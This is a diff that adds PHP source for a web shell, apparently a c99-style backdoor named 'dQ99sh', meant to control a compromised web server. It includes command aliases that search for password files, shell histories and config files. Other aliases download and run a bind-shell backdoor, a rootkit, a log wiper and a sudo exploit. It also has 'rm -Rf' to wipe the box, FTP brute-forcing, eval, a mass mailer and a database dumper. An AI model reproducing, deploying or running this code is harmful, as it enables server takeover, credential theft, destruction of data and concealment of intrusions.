+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
+  array("\.tgz$",1,"<font color=#C082FF>","</font>"),
+  array("\.gz$",1,"<font color=#C082FF>","</font>"),
+  array("\.tar$",1,"<font color=#C082FF>","</font>"),
+  array("\.bz2$",1,"<font color=#C082FF>","</font>"),
+  array("\.zip$",1,"<font color=#C082FF>","</font>"),
+  array("\.rar$",1,"<font color=#C082FF>","</font>"),
+  array("\.php$",1,"<font color=#00FF00>","</font>"),
+  array("\.php3$",1,"<font color=#00FF00>","</font>"),
+  array("\.php4$",1,"<font color=#00FF00>","</font>"),
+  array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
+  array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
+  array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
+  array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
+  array("\.ico$",1,"<font color=#00FFFF>","</font>"),
+  array("\.gif$",1,"<font color=#00FFFF>","</font>"),
+  array("\.png$",1,"<font color=#00FFFF>","</font>"),
+  array("\.htm$",1,"<font color=#00CCFF>","</font>"),
+  array("\.html$",1,"<font color=#00CCFF>","</font>"),
+  array("\.txt$",1,"<font color=#C0C0C0>","</font>")
+);
+## QUICK COMMANDS ##
+if (!$win) {
+  $cmdaliases = array(
+    array("", "ls -al"),
+    array("Find all suid files", "find / -type f -perm -04000 -ls"),
+    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
+    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
+    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
+    array("Find config* files", "find / -type f -name \"config*\""),
+    array("Find config* files in current dir", "find . -type f -name \"config*\""),
+    array("Find all writable folders and files", "find / -perm -2 -ls"),
+    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
+    array("Find all writable folders", "find / -type d -perm -2 -ls"),
+    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
+    array("Find all service.pwd files", "find / -type f -name service.pwd"),
+    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
+    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
+    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+    array("Find all .bash_history files", "find / -type f -name .bash_history"),
+    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
+    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+    array("List file attributes on a Linux second extended file system", "lsattr -va"),
+    array("Show opened ports", "netstat -an | grep -i listen")
+  );
+  $cmdaliases2 = array(
+    array("wget & extract psyBNC","wget ".$sh_mainurl."dQ.tgz;tar -zxf dQ.tgz"),
+    array("wget & extract EggDrop","wget ".$sh_mainurl."dQb.tgz;tar -zxf dQb.tgz"),
+    array("-----",""),
+    array("Logged in users","w"),
+    array("Last to connect","lastlog"),
+    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
+    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
+    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
+    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
+    array("CPU Info","cat /proc/version /proc/cpuinfo"),
+    array("Is gcc installed ?","locate gcc"),
+    array("Format box (DANGEROUS)","rm -Rf"),
+    array("-----",""),
+    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
+    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
+    array("Run WIPELOGS PT3","./zap2"),
+    array("-----",""),
+    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
+    array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
+    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
+  );
+}
+else {
+  $cmdaliases = array(
+    array("", "dir"),
+    array("Find index.php in current dir", "dir /s /w /b index.php"),
+    array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
+    array("Find c99shell in current dir", "find /c \"c99\" *"),
+    array("Find r57shell in current dir", "find /c \"r57\" *"),
+    array("Find dQ99shell in current dir", "find /c \"dQ99\" *"),
+    array("Show active connections", "netstat -an"),
+    array("Show running services", "net start"),
+    array("User accounts", "net user"),
+    array("Show computers", "net view"),
+  );
+}
+## PHP FILESYSTEM TRICKS (By diKi) ##
+$phpfsaliases = array(
+    array("Read File", "read", 1, "File", ""),
+    array("Write File (PHP5)", "write", 2, "File","Text"),
+    array("Copy", "copy", 2, "From", "To"),
+    array("Rename/Move", "rename", 2, "File", "To"),
+    array("Delete", "delete", 1 ,"File", ""),
+    array("Make Dir","mkdir", 1, "Dir", ""),
+    array("Download", "download", 2, "URL", "To"),
+    array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
+    array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
+    array("Find Writable Dir", "fwritabledir", 2 ,"Dir"),
+    array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
+);
+## QUICK LAUNCH ##
+$quicklaunch1 = array(
+    array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
+    array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
+    array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
+    array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+    array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
+    array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
+);
+$quicklaunch2 = array(
+    array("Security Info",$surl."act=security&d=%d"),
+    array("Processes",$surl."act=processes&d=%d"),
+    array("MySQL",$surl."act=sql&d=%d"),
+    array("Eval",$surl."act=eval&d=%d"),
+    array("Encoder",$surl."act=encoder&d=%d"),
+    array("Mailer",$surl."act=dQmailer"),
+    array("milw0rm",$millink),
+    array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
+    array("Toolz",$surl."act=tools&d=%d"),
+    array("Kill-Shell",$surl."act=selfremove"),
+    array("Feedback",$surl."act=feedback"),
+    array("Update",$surl."act=update"),
+    array("About",$surl."act=about")
+);
+if (!$win) {
+  $quicklaunch2[] = array("<br>FTP-Brute",$surl."act=ftpquickbrute&d=%d");
+}
+## HIGHLIGHT CODE ##
+$highlight_background = "#C0C0C0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+####################
+##[ AUTHENTICATE ]##
+####################
+$tmp = array();
+foreach ($auth["hostallow"] as $k => $v) {
+  $tmp[] = str_replace("\\*",".*",preg_quote($v));
+}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
+  exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
+}
+if (!empty($auth["login"])) {
+  if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
+  if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
+    header("WWW-Authenticate: Basic realm=\"".$sh_name.": Restricted Area\"");
+    header("HTTP/1.0 401 Unauthorized");
+    die($auth["denied"]);
+  }
+}
+## END AUTHENTICATE ##
+
+if ($act != "img") {
+  $lastdir = realpath(".");
+  chdir($curdir);
+  if ($updatenow) { @ob_clean(); dQ99sh_getupdate(1); exit; }
+  $sess_data = @unserialize($_COOKIE["$sess_cookie"]);
+  if (!is_array($sess_data)) { $sess_data = array(); }
+  if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); }
+  if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); }
+  dQ99_buff_prepare();
+  foreach (array("sort","sql_sort") as $v) {
+    if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+    if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+  }
+  if ($sort_save) {
+    if (!empty($sort)) {setcookie("sort",$sort);}
+    if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+  }
+  if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+  if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+  if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+  if (!function_exists("mysql_dump")) {
+    function mysql_dump($set) {
+      global $sh_ver;
+      $sock = $set["sock"];
+      $db = $set["db"];
+      $print = $set["print"];
+      $nl2br = $set["nl2br"];
+      $file = $set["file"];
+      $add_drop = $set["add_drop"];
+      $tabs = $set["tabs"];
+      $onlytabs = $set["onlytabs"];
+      $ret = array();
+      $ret["err"] = array();
+      if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+      if (empty($db)) {$db = "db";}
+      if (empty($print)) {$print = 0;}
+      if (empty($nl2br)) {$nl2br = 0;}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (empty($file)) {
+        $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+      }
+      if (!is_array($tabs)) {$tabs = array();}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (sizeof($tabs) == 0) {
+        //Retrieve tables-list
+        $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+        if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+      }
+      $out = "
+      # Dumped by ".$sh_name."
+      #
+      # Host settings:
+      # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+      # Date: ".date("d.m.Y H:i:s")."
+      # DB: \"".$db."\"
+      #---------------------------------------------------------";
+      $c = count($onlytabs);
+      foreach($tabs as $tab) {
+        if ((in_array($tab,$onlytabs)) or (!$c)) {
+          if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+          //Receieve query for create table structure
+          $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+          if (!$res) {$ret["err"][] = mysql_smarterror();}
+          else {
+            $row = mysql_fetch_row($res);
+            $out .= $row["1"].";\n\n";
+            //Receieve table variables
+            $res = mysql_query("SELECT * FROM `$tab`", $sock);
+            if (mysql_num_rows($res) > 0) {
+              while ($row = mysql_fetch_assoc($res)) {
+                $keys = implode("`, `", array_keys($row));
+                $values = array_values($row);
+                foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+                $values = implode("', '", $values);
+                $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+                $out .= $sql;
+              }
+            }
+          }
+        }
+      }
+      $out .= "#---------------------------------------------------------------------------------\n\n";
+      if ($file) {
+        $fp = fopen($file, "w");
+        if (!$fp) {$ret["err"][] = 2;}
+        else {
+          fwrite ($fp, $out);
+          fclose ($fp);
+        }
+      }
+      if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+      return $out;
+    }
+  }
+  if (!function_exists("mysql_buildwhere")) {
+    function mysql_buildwhere($array,$sep=" and",$functs=array()) {
+      if (!is_array($array)) {$array = array();}
+      $result = "";
+      foreach($array as $k=>$v) {
+        $value = "";
+        if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+        $value .= "'".addslashes($v)."'";
+        if (!empty($functs[$k])) {$value .= ")";}
+        $result .= "`".$k."` = ".$value.$sep;
+      }
+      $result = substr($result,0,strlen($result)-strlen($sep));
+      return $result;
+    }
+  }
+  if (!function_exists("mysql_fetch_all")) {
+    function mysql_fetch_all($query,$sock) {
+      if ($sock) {$result = mysql_query($query,$sock);}
+      else {$result = mysql_query($query);}
+      $array = array();
+      while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+      mysql_free_result($result);
+      return $array;
+    }
+  }
+  if (!function_exists("mysql_smarterror")) {
+    function mysql_smarterror($type,$sock) {
+      if ($sock) {$error = mysql_error($sock);}
+      else {$error = mysql_error();}
+      $error = htmlspecialchars($error);
+      return $error;
+    }
+  }
+  if (!function_exists("mysql_query_form")) {
+    function mysql_query_form() {
+      global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+      if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+      if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+      if ((!$submit) or ($sql_act)) {
+        echo "<table border=0><tr><td><form name=\"dQ99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
+        if ($tbl_struct) {
+          echo "<td valign=\"top\"><b>Fields:</b><br>";
+          foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.dQ99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+          echo "</td></tr></table>";
+        }
+      }
+      if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+    }
+  }
+  if (!function_exists("mysql_create_db")) {
+    function mysql_create_db($db,$sock="") {
+      $sql = "CREATE DATABASE `".addslashes($db)."`;";
+      if ($sock) {return mysql_query($sql,$sock);}
+      else {return mysql_query($sql);}
+    }
+  }
+  if (!function_exists("mysql_query_parse")) {
+    function mysql_query_parse($query) {
+      $query = trim($query);
+      $arr = explode (" ",$query);
+      $types = array(
+        "SELECT"=>array(3,1),
+        "SHOW"=>array(2,1),
+        "DELETE"=>array(1),
+        "DROP"=>array(1)
+      );
+      $result = array();
+      $op = strtoupper($arr[0]);
+      if (is_array($types[$op])) {
+        $result["propertions"] = $types[$op];
+        $result["query"]  = $query;
+        if ($types[$op] == 2) {
+          foreach($arr as $k=>$v) {
+            if (strtoupper($v) == "LIMIT") {
+              $result["limit"] = $arr[$k+1];
+              $result["limit"] = explode(",",$result["limit"]);
+              if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+              unset($arr[$k],$arr[$k+1]);
+            }
+          }
+        }
+      }
+      else {return FALSE;}
+    }
+  }
+  if ($act == "gofile") {
+    if (is_dir($f)) { $act = "ls"; $d = $f; }
+    else { $act = "f"; $d = dirname($f); $f = basename($f); }
+  }
+  ## HEADERS ##
+  @ob_start();
+  @ob_implicit_flush(0);
+  header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+  header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+  header("Cache-Control: no-store, no-cache, must-revalidate");
+  header("Cache-Control: post-check=0, pre-check=0", FALSE);
+  header("Pragma: no-cache");
+  if (empty($tmpdir)) {
+    $tmpdir = ini_get("upload_tmp_dir");
+    if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+  }
+  $tmpdir = realpath($tmpdir);
+  $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+  if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+  if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+  else {$tmpdir_logs = realpath($tmpdir_logs);}
+  $sort = htmlspecialchars($sort);
+  if (empty($sort)) {$sort = $sort_default;}
+  $sort[1] = strtolower($sort[1]);
+  $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+  if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+  $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+  @ini_set("highlight.bg",$highlight_bg);
+  @ini_set("highlight.comment",$highlight_comment);
+  @ini_set("highlight.default",$highlight_default);
+  @ini_set("highlight.html",$highlight_html);
+  @ini_set("highlight.keyword",$highlight_keyword);
+  @ini_set("highlight.string",$highlight_string);
+  if (!is_array($actbox)) { $actbox = array(); }
+  $dspact = $act = htmlspecialchars($act);
+  $disp_fullpath = $ls_arr = $notls = null;
+  $ud = @urlencode($d);
+  if (empty($d)) {$d = realpath(".");}
+  elseif(realpath($d)) {$d = realpath($d);}
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $d = str_replace("\\\\","\\",$d);
+  $dispd = htmlspecialchars($d);
+  $safemode = safemode();
+  if ($safemode) {
+    $hsafemode = "<font color=#3366FF><b>SAFE MODE IS ON</b></font>";
+    $safemodeexecdir = @ini_get("safe_mode_exec_dir");
+  }
+  else { $hsafemode = "<font color=#FF9900><b>SAFE MODE IS OFF</b></font>"; }
+  $v = @ini_get("open_basedir");
+  if ($v or strtolower($v) == "on") {
+    $openbasedir = TRUE;
+    $hopenbasedir = "<font color=red>".$v."</font>";
+  }
+  else {
+    $openbasedir = FALSE;
+    $hopenbasedir = "<font color=green>OFF (not secure)</font>";
+  }
+  
+##################
+##[ HTML START ]##
+##################
+function srv_info($title,$contents) {
+  echo "<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n";
+}
+echo htmlhead($hsafemode);
+echo "<table id=pagebar>";
+echo "<tr><td colspan=2>\n";
+echo "<div class=fleft>$hsafemode</div>\n";
+echo "<div class=fright>";
+echo "IP Address: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".@gethostbyname($_SERVER["HTTP_HOST"])."\">".@gethostbyname($_SERVER["HTTP_HOST"])."</a> ".
+     "You: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".$_SERVER["REMOTE_ADDR"]."\">".$_SERVER["REMOTE_ADDR"]."</a> ".
+     ($win?"Drives: ".disp_drives($d,$surl):"");
+echo "</div>\n</td></tr>\n";
+echo "<tr><td width=50%>\n";
+echo "<table class=info>\n";
+srv_info("Software","".$DISP_SERVER_SOFTWARE);
+srv_info("Uname",php_uname());
+srv_info("User",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : dQ99exec("id"));
+echo "</table></td>\n".
+     "<td width=50%>\n";
+echo "<table class=info>\n";
+srv_info("Freespace",disp_freespace($d));
+echo "</table></td></tr>\n";
+echo "<tr><td colspan=2>\n";
+echo get_status();
+echo "</td></tr>\n";
+echo "<tr><td colspan=2>\n";
+echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir."<br>\n" : "";
+echo showdisfunc() ? "DisFunc: ".showdisfunc()."\n" : "";
+echo "</td></tr>\n";
+echo "<tr><td colspan=2 id=mainmenu>\n";
+if (count($quicklaunch2) > 0) {
+  foreach($quicklaunch2 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td>\n".
+     "<tr><td colspan=2 id=mainmenu>\n";
+if (count($quicklaunch1) > 0) {
+  foreach($quicklaunch1 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td></tr>\n<tr><td colspan=2>";
+echo "<p class=fleft>\n";
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b) {
+  $t = ""; $j = 0;
+  foreach ($e as $r) {
+    $t.= $r.DIRECTORY_SEPARATOR;
+    if ($j == $i) { break; }
+    $j++;
+  }
+  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>\n";
+  $i++;
+}
+echo " - ";
+if (is_writable($d)) {
+  $wd = TRUE;
+  $wdt = "<font color=#00FF00>[OK]</font>";
+  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else {
+  $wd = FALSE;
+  $wdt = "<font color=red>[Read-Only]</font>";
+  echo "<b>".view_perms_color($d)."</b>";
+}
+echo "\n</p>\n";
+?>
+<div class=fright>
+<form method="POST"><input type=hidden name=act value="ls">
+Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
+</form>
+</div>
+</td></tr></table>
+<?php
+/***********************/
+/** INFORMATION TABLE **/
+/***********************/
+echo "<table id=maininfo><tr><td width=\"100%\">\n";
+if ($act == "") { $act = $dspact = "ls"; }
+if ($act == "sql") {
+  $sql_surl = $surl."act=sql";
+  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+  $sql_surl .= "&";
+  echo "<h4>Attention! MySQL Manager is <u>NOT</u> a ready module! Don't reports bugs.</h4>".
+       "<table>".
+       "<tr><td width=\"100%\" colspan=2 class=barheader>";
+  if ($sql_server) {
+    $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+    $err = mysql_smarterror();
+    @mysql_select_db($sql_db,$sql_sock);
+    if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+  }
+  else {$sql_sock = FALSE;}
+  echo ".: SQL Manager :.<br>";
+  if (!$sql_sock) {
+    if (!$sql_server) {echo "NO CONNECTION";}
+    else {echo "Can't connect! ".$err;}
+  }
+  else {
+    $sqlquicklaunch = array();
+    $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+    $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+    $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+    $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+    $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+    $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+    echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
+    if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+  }
+  echo "</td></tr><tr>";
+  if (!$sql_sock) {
+    echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
+    echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
+  }
+  else {
+    //Start left panel
+    if (!empty($sql_db)) {
+      ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_tables($sql_db);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+        $c = 0;
+        while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+        if (!$c) {echo "No tables found in database.";}
+      }
+    }
+    else {
+      ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_dbs($sql_sock);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
+        <?php
+        $c = 0;
+        $dbs = "";
+        while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+        echo "<option value=\"\">Databases (".$c.")</option>";
+        echo $dbs;
+      }
+      ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
+      <?php
+    }
+    //End left panel
+    echo "</td><td width=\"100%\">";
+    //Start center panel
+    $diplay = TRUE;
+    if ($sql_db) {
+      if (!is_numeric($c)) {$c = 0;}
+      if ($c == 0) {$c = "no";}
+      echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+      if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+      echo "</b></center>";
+      $acts = array("","dump");
+      if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+
+      elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
